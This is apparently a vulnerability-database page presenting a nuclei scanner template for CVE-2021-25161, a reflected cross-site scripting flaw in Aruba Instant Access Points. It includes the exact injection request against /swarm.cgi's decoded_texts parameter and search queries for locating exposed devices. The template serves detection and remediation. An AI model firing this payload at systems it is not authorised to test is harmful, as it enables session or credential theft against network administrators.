Lucene search
K

Aruba Instant Access Point (IAP) - Cross-Site Scripting

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 22 Views

Cross-Site Scripting vulnerability affects multiple Aruba Instant Access Point versions; upgrade recommended.

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Aruba Instant (IAP) - Remote Code Execution Exploit
16 Jul 202100:00
zdt
Circl
CVE-2021-25161
21 May 202512:32
circl
CNNVD
Aruba Instant Access Point 跨站脚本漏洞
29 Mar 202100:00
cnnvd
CVE
CVE-2021-25161
30 Mar 202101:44
cve
Cvelist
CVE-2021-25161
30 Mar 202101:44
cvelist
EUVD
EUVD-2021-12072
7 Oct 202500:30
euvd
NCSC
Vulnerabilities fixed in Siemens SCALANCE W1750D (Aruba Instant Access Points)
11 May 202100:00
ncsc
NCSC
Vulnerabilities fixed in Siemens Scalance products
10 Aug 202100:00
ncsc
NVD
CVE-2021-25161
30 Mar 202102:15
nvd
OSV
CVE-2021-25161
30 Mar 202102:15
osv
Rows per page
id: CVE-2021-25161

info:
  name: Aruba Instant Access Point (IAP) - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    A remote cross-site scripting (xss) vulnerability was discovered in some Aruba Instant Access Point (IAP) products in version(s): Aruba Instant 6.4.x: 6.4.4.8-4.2.4.17 and below; Aruba Instant 6.5.x: 6.5.4.18 and below; Aruba Instant 8.3.x: 8.3.0.14 and below; Aruba Instant 8.5.x: 8.5.0.11 and below; Aruba Instant 8.6.x: 8.6.0.7 and below; Aruba Instant 8.7.x: 8.7.1.1 and below.
  impact: |
    Attackers can inject malicious JavaScript via reflected XSS in the decoded_texts parameter, potentially stealing administrator credentials or manipulating access point configurations.
  remediation: |
    Upgrade to the latest version of Swarm that addresses this vulnerability.Implement proper input validation and output encoding for user-supplied data.
  reference:
    - https://alephsecurity.com/2021/07/15/aruba-instant/?utm_source=feedly
    - https://nvd.nist.gov/vuln/detail/CVE-2021-25161
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-25161
    cwe-id: CWE-79
    epss-score: 0.16372
    epss-percentile: 0.9658
  metadata:
    verified: true
    max-request: 1
    vendor: aruba
    product: aruba-instant-access-point
    shodan-query: title:"Aruba"
    fofa-query: body="jscripts/third_party/raphael-treemap.min.js" || body="jscripts/third_party/highcharts.src.js"
  tags: cve,cve2021,xss,aruba,web,vuln

http:
  - raw:
      - |
        GET /swarm.cgi?opcode=cp_preview&bg_color=AA&banner_color=B&banner_text=AAA&terms_of_use=AAA&use_policy=BBB&authenticated=False&decoded_texts="%27;%0Aalert(document.domain);//%0a%27 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - var decode_string = '"';
          - alert(document.domain);//
        condition: and

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100debcac675933efb5294f43b22722341b8c7fdf002e8bdf33b103f60629f9a09102207d968ca6c67ba642d2e81b0a0e79ad44a9d4a88ef41af467357799cdebe8199c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 24.3
CVSS 3.16.1
EPSS0.16372
22